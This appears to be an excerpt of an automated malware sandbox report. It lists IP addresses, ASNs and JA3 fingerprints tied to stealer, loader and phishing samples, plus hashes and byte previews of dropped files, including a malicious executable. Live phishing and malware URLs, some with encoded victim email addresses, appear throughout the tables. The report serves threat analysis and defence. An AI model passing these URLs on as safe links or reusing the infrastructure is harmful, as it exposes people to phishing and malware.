                          NvOx95swMQ.exeGet hashmaliciousRedLineBrowse
                          • 104.21.76.57

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSE3QY28nEGw.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          Loader.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          https://mail.pfl.fyi/v1/messages/01908334-e393-7458-9c90-4bc936083ce5/click?link_id=01908334-e3fc-77dc-92c2-5e672d85948e&signature=1ef5bed49d6e50fcd32c0f9b16df738b5c236201#cmVzb3J0QHNibS5tYw==Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          https://forms.gle/TNmqAFZNBWKPpJ716Get hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          Iucn Payment Detail.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          http://lime.pulsebioconnect.com.tr/powerboy/playing/46216d8cdf948d70a1073aab4518d1aba53d337a/sf_base/d29qY2llY2gubGF0b2NoYUBjY2MuZXU=Get hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 172.64.41.3
                          PAZxQIjeuyCNRXg.exeGet hashmaliciousFormBookBrowse
                          • 104.21.92.59
                          https://businesstravelportal.airplus.com/portal/go/statements/Get hashmaliciousUnknownBrowse
                          • 104.18.142.119
                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                          • 188.114.96.3
                          CLOUDFLARENETUSE3QY28nEGw.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          Loader.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          https://mail.pfl.fyi/v1/messages/01908334-e393-7458-9c90-4bc936083ce5/click?link_id=01908334-e3fc-77dc-92c2-5e672d85948e&signature=1ef5bed49d6e50fcd32c0f9b16df738b5c236201#cmVzb3J0QHNibS5tYw==Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          https://forms.gle/TNmqAFZNBWKPpJ716Get hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          Iucn Payment Detail.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          http://lime.pulsebioconnect.com.tr/powerboy/playing/46216d8cdf948d70a1073aab4518d1aba53d337a/sf_base/d29qY2llY2gubGF0b2NoYUBjY2MuZXU=Get hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 172.64.41.3
                          PAZxQIjeuyCNRXg.exeGet hashmaliciousFormBookBrowse
                          • 104.21.92.59
                          https://businesstravelportal.airplus.com/portal/go/statements/Get hashmaliciousUnknownBrowse
                          • 104.18.142.119
                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                          • 188.114.96.3
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousPython Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                          • 185.215.113.67
                          setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                          • 185.215.113.67
                          setup.exeGet hashmaliciousRedLineBrowse
                          • 185.215.113.67
                          1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                          • 185.215.113.67
                          hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                          • 185.215.113.67
                          mCTacyNuyM.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                          • 185.215.113.67
                          yWny5Jds8b.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                          • 185.215.113.67
                          file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                          • 185.215.113.67
                          setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                          • 185.215.113.67
                          setup.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                          • 185.215.113.67
                          AMAZON-02USHoliday_Cybersecurity_Guide.docxGet hashmaliciousUnknownBrowse
                          • 52.210.37.18
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 143.204.215.105
                          PAZxQIjeuyCNRXg.exeGet hashmaliciousFormBookBrowse
                          • 3.64.163.50
                          Adcb-Rtgs_Neft-46204.txt.jarGet hashmaliciousUnknownBrowse
                          • 3.5.218.63
                          setup.exeGet hashmaliciousBabadeda, RHADAMANTHYS, RedLineBrowse
                          • 104.192.141.1
                          https://a6ad66b3.docsx.pages.dev/Get hashmaliciousUnknownBrowse
                          • 52.85.132.27
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 143.204.215.105
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 143.204.215.122
                          http://profile-appeal-violation-status.surge.sh/index.htmlGet hashmaliciousUnknownBrowse
                          • 76.76.21.142
                          http://dvcgfqohwce.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                          • 3.255.41.64

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          1138de370e523e824bbca92d049a3777240619_A300_11468_20240619_0926.htmlGet hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          https://hij.koc.mybluehost.me/Z/Get hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          https://www.google.com/url?q=https://emea.dcv.ms/yVXFxxztE3&source=gmail&ust=1720483584380000&usg=AOvVaw1biqMGcy1vpswd7dOhsiWR'Get hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          InvoiceAWB(112) .htmlGet hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          https://aamnakhaliq.github.io/Netflix-websiteGet hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          https://www.hergunavantaj.com.tr/4vjqtve038/accountGet hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          https://hadiqakhan123.github.io/class-taskGet hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          http://pub-9f23a057c92846ceb9a489bd3cb57fd5.r2.dev/index.htm?y=d:%25jx@bli4f1ud%7Cbibgos??uGet hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          https://questwetport10.buzz/Get hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          http://protect-human-rights-07cd9688h4.netlify.app/id.html/Get hashmaliciousUnknownBrowse
                          • 173.222.162.60
                          28a2c9bd18a11de089ef85a160da29e4http://caaeeaf.r.af.d.sendibt2.com/tr/cl/A7tKiQrXx5HHOrdcILRkj6QiCR9h7uDpSdKXjLcAXmfTAgQUexPq63PBkgUyexWqDv2pl_26q_i2a6FAPmD0V9AHaUj6PsDZqEDKGGx5nAvfy2iRy6IUW54VYjyjkGK1D4YijomUqiEsCQbHYzdXd8ZeURmDO9qkub7XVxpg3wHfO25u26uP7SGW4a7Yi6oOIoG6w3zxk_7NspAGet hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          https://mail.pfl.fyi/v1/messages/01908334-e393-7458-9c90-4bc936083ce5/click?link_id=01908334-e3fc-77dc-92c2-5e672d85948e&signature=1ef5bed49d6e50fcd32c0f9b16df738b5c236201#cmVzb3J0QHNibS5tYw==Get hashmaliciousHTMLPhisherBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          240619_A300_11468_20240619_0926.htmlGet hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          https://forms.gle/TNmqAFZNBWKPpJ716Get hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          http://roycamining.comGet hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          https://businesstravelportal.airplus.com/portal/go/statements/Get hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          http://www.nyfzx.com/showWiki.aspx?id=142Get hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          https://share.hsforms.com/1Em8WQwu9QQy0evAOGJf5Hwrp5zwGet hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=y8WYKByhAE-PQmCpBHM28YWYrIrntjdJiNDbsLTiwthUQkZBN1lDSlFUUVU4Vjg2UFBMTkRDU1g2Ri4uGet hashmaliciousUnknownBrowse
                          • 184.28.90.27
                          • 20.114.59.183
                          3b5074b1b5d032e5620f69f9f700ff0eBL INV PACKING LIST.exeGet hashmaliciousAgentTeslaBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          https://www.google.com/url?q=https://emea.dcv.ms/yVXFxxztE3&source=gmail&ust=1720483584380000&usg=AOvVaw1biqMGcy1vpswd7dOhsiWR'Get hashmaliciousUnknownBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          PRE ALERT (HBL, MBL and D-N).xlsx.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          P.O.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          https://hadiqakhan123.github.io/nwaGet hashmaliciousUnknownBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          https://support-metmicxtenson.webflow.io/Get hashmaliciousUnknownBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          https://bt-broadband-6ce919.webflow.io/Get hashmaliciousUnknownBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          https://hadiqakhan123.github.io/class-taskGet hashmaliciousUnknownBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          https://boliwnx-alwinfs-colivak-boening.pages.dev/robots.txt2606:4700:310c::ac42:2c64Get hashmaliciousUnknownBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          https://questwetport10.buzz/Get hashmaliciousUnknownBrowse
                          • 40.113.110.67
                          • 52.216.42.97
                          • 104.192.141.1
                          • 40.113.103.199
                          a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousPython Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                          • 188.114.96.3
                          HrsynxuhbI.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 188.114.96.3
                          hH5mo7aGIf.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                          • 188.114.96.3
                          scan_quotation.xlsGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          Laun3cher_E@zy.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 188.114.96.3
                          UlVCqlQ0lF.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          • 188.114.96.3

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\7.exed8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\7.exe

                            Download File
                            Process:C:\Users\user\Desktop\dlcdkJcbbV.exe
                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                            Category:dropped
                            Size (bytes):7386624
                            Entropy (8bit):6.603041940173322
                            Encrypted:false
                            SSDEEP:49152:EfMhc7XOayJj55BNcU0KA///skFyE6OjBuXVBw5yyk0+fNH4YxVjM5EmOj1Ggdap:Osc7XL4JNgB01XVKkuFEmBhIGFH
                            MD5:F308BE1162C86C3D72AD06C4C85A67D4
                            SHA1:C09E56BDE09F752265D8527DD930715CE8E149E2
                            SHA-256:842E6467D3F6BDDB484929A8DBA9757920E0B484D8ADDF40A8FE69F8B205F174
                            SHA-512:801D273AFCF3994C0B02466E3D5343CBB5EC6665ABAF5B9A6E4E376E39E0DEC6B572D9B7760F53842E6A65C6314567C85FEA9A41833A8C29ED3B0C5D57C1108A
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 83%
                            Joe Sandbox View:
                            • Filename: d8gZVaN0ms.exe, Detection: malicious, Browse
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.\'...p................@............................. w.......q...`... .......................................u.N.....u.......u..A....n.d............0v.x.............................n.(...................|.u.@............................text... Z'......\'.................`.``.data...Pk...p'..l...`'.............@.`..rdata..0.:...3...:...3.............@.`@.pdata..d.....n.......n.............@.0@.xdata..D.....o......ho.............@.0@.bss....`.....o.......................`..edata..N.....u......vo.............@.0@.idata........u......xo.............@.0..CRT....p.....u.......o.............@.@..tls..........u.......o.............@.@..rsrc....A....u..B....o.............@.0..reloc..x....0v.......o.............@.0B................................................................................................................................

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 8 07:09:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2675
                            Entropy (8bit):3.985687454047367
                            Encrypted:false
                            SSDEEP:48:8bodST2AHxidAKZdA1kehwiZUklqehYy+3:8bpyb/y
                            MD5:B606BF3B89DC1254ADC47A5888E9958E
                            SHA1:657EE0D3211C713E8F99B49D17B68E3F17A3286E
                            SHA-256:BC9193B73914963144CF7950D56762A759E9E8B68C473B442EB22588BF1DCF07
                            SHA-512:65AADC29FEE1EE2C76BD259A312E31FA38E37A51CF993A21D5EA7CB8D8229E48C94C866097F4C109FC3221CF13BAA9A0B07E75CD14BDAC1ED7F6907A0BAC4455
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,.......&........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.X,A....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X,A....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.X,A....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.X,A............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.A.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........e........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 8 07:09:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):4.001978977511144
                            Encrypted:false
                            SSDEEP:48:8dodST2AHxidAKZdA1jeh/iZUkAQkqehvy+2:8dpyP9Qiy
                            MD5:1BC101A294031DD08A6A9B3ECDF34FF7
                            SHA1:E8BD22446A753F7586C99EF43E16B5515789D1FF
                            SHA-256:BDD495086EAEA39203EA96B88587B1A43DE7BE76EB4F768BF476C97F0D5EF74D
                            SHA-512:79B13AB38267960F0F857E96C51AB585346BC2535097F820495C0A5060A79D634E52E89598E6FF96B699045E2D52A276D9933AA7B884A7DCB6062E9CF3E347DF
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,......&........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.X,A....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X,A....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.X,A....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.X,A............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.A.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........e........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 10:41:16 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2691
                            Entropy (8bit):4.013631761840761
                            Encrypted:false
                            SSDEEP:48:8wodST2uHxidAKZdA14Peh7sFiZUkmgqeh7spy+BX:8wpyrnTy
                            MD5:2B5F0BA15AAAD50D14A95FF065A537AD
                            SHA1:2AFF380B376A0C71060B4A0F277215DEB6465C16
                            SHA-256:9F2A8CF2EAD7B07F33BB7C747360F623C7D4275E58776CAB432A17D62F077710
                            SHA-512:18E978C5CA6C69C7B740CBD0E852E3FE3A6A7931899DF4D85911700B4686D4BC77BF4CAFFFB2C441EEDA1F826D508046FD653026B99B91D7031369E391FB2993
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.X,A....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X,A....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.X,A....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.X,A............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.[.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........e........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 8 07:09:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2679
                            Entropy (8bit):3.997992102665274
                            Encrypted:false
                            SSDEEP:48:8dodST2AHxidAKZdA1GehDiZUkwqehby+R:8dpyKxy
                            MD5:999598A6FBF9DB6F5F35823E4DCE4E72
                            SHA1:7E15644A1E5F85C951B8F0B460AE7033C17358E1
                            SHA-256:7309C3800571B6361B95B20B71CE628D2606106BC69DFEB4856EA2C9FDA611B2
                            SHA-512:7833FA33DF052C5A131F954BAC13D63844855950F019FEBFD040F91B6F8CA279743E2418FEBD84EB5BE9516C15B23475C4E1C0A54361A3249101781BD8268A6F
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,.....e.&........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.X,A....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X,A....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.X,A....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.X,A............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.A.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........e........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 8 07:09:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2679
                            Entropy (8bit):3.9887485489442756
                            Encrypted:false
                            SSDEEP:48:85XodST2AHxidAKZdA1IehBiZUk1W1qeh9y+C:85pya9dy
                            MD5:0E49C80709C0C3BA9AD6C3EB76C070A9
                            SHA1:F34C3977A148C4F4BD4E4D9872BBC9B87F793BDE
                            SHA-256:C9FCF8ADA841690DC5FF574885A152606D92CB33A373BE224DE29C2EC9F06FB8
                            SHA-512:8B0F4BA6D3F1F8EC80BD7B9104141BC43100DBF188A73EF44414894708ECF04C6117C93E5F2877D8BC0E6D6DE108F930EB1608D279DFF99A516381060A3853DA
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,.......&........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.X,A....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X,A....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.X,A....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.X,A............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.A.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........e........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 8 07:09:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2681
                            Entropy (8bit):4.000310666636908
                            Encrypted:false
                            SSDEEP:48:8kodST2AHxidAKZdA1duTBehOuTbbiZUk5OjqehOuTbTy+yT+:8kpyHT2TbxWOvTbTy7T
                            MD5:FA6D0A403B0435237A3E05B7331CA1BF
                            SHA1:20E3737CAE3B72DB05963D808BCA1A084FA4E1E1
                            SHA-256:64A377600794E52B642A5760D574ECC367ABF5168D805A98FA1C5888622FD473
                            SHA-512:27EFFBF45FC133FC9F24F75FB669A6F310FEED02DFF658FFA906C603F51B21A17872A0BF1F0BF15C8E190E5752A997A5B135E7C83FECCED8FFB78A81A61B34AF
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,....9.&........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.I.X,A....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X,A....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.V.X,A....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.V.X,A............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.A.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........e........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                            Chrome Cache Entry: 68

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                            Category:downloaded
                            Size (bytes):2833
                            Entropy (8bit):7.876846206921263
                            Encrypted:false
                            SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                            MD5:18C023BC439B446F91BF942270882422
                            SHA1:768D59E3085976DBA252232A65A4AF562675F782
                            SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                            SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                            Malicious:false
                            URL:https://iplogger.co/favicon.ico
